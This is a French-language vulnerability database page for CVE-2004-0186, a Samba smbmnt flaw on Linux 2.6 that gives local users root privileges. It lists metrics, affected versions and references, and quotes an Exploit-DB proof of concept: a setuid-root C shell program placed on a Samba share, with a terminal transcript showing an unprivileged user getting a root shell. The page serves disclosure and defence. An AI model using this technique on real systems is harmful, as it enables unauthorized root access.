CVE-2004-0186 : Détail

CVE-2004-0186

0.04%V3
Local
2004-09-01 02:00 +00:00
2004-08-19 22:00 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

smbmnt in Samba 2.x and 3.x on Linux 2.6, when installed setuid, allows local users to gain root privileges by mounting a Samba share that contains a setuid root program, whose setuid attributes are not cleared when the share is mounted.

Informations

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 23674

Date de publication : 2004-02-08 23:00 +00:00
Auteur : Martin Fiala
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/9619/info A local privilege escalation vulnerability has been reported to affect the 2.6 Linux kernel. The issue appears to exist due to a lack of sufficient sanity checks performed when executing a file that is hosted on a remote Samba share. An attacker may exploit this condition to gain elevated privileges, as the setuid/setgid bit of a remote file is honored on the local system. misko@slovakia:~$ smbmount --version Usage: mount.smbfs service mountpoint [-n] [-o options,...] Version 3.0.1-Debian misko@slovakia:~$ ls -l /usr/bin/smbmount - - -rwxr-xr-x 1 root root 591756 2004-01-13 20:29 /usr/bin/smbmount misko@slovakia:~$ ls -l /usr/bin/smbmnt - - -rwsr-sr-x 1 root root 8088 2004-01-13 20:29 /usr/bin/smbmnt ^ Confirmed to be default on Debian and Mandrake. share:/data/share# cat a.c main() { setuid(0); setgid(0); system("/bin/bash"); } share:/data/share# make a cc a.c -o a share:/data/share# chmod +s a share:/data/share# share:/etc/samba/smb.conf [share] path = /data/share writable = no locking = no public = yes guest ok = yes comment = Share share:/data/share# ls -l a - - -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a misko@slovakia:~$ ls -l pokus/a - - -rwsr-sr-x 1 root root 11716 2004-02-08 12:39 pokus/a misko@slovakia:~$ pokus/a root@slovakia:~# id uid=0(root) gid=0(root) skupiny=1000(misko),0(root),29(audio),100(users),1034(mtr),1035(333) root@slovakia:~#

Products Mentioned

Configuraton 0

Samba>>Samba >> Version 2.0

Samba>>Samba >> Version 3.0.0

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6_test9_cvs

    References

    http://marc.info/?l=bugtraq&m=107657505718743&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    http://www.osvdb.org/3916
    Tags : vdb-entry, x_refsource_OSVDB
    http://marc.info/?l=bugtraq&m=107636290906296&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    http://www.debian.org/security/2004/dsa-463
    Tags : vendor-advisory, x_refsource_DEBIAN
    http://www.securityfocus.com/bid/9619
    Tags : vdb-entry, x_refsource_BID
    Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.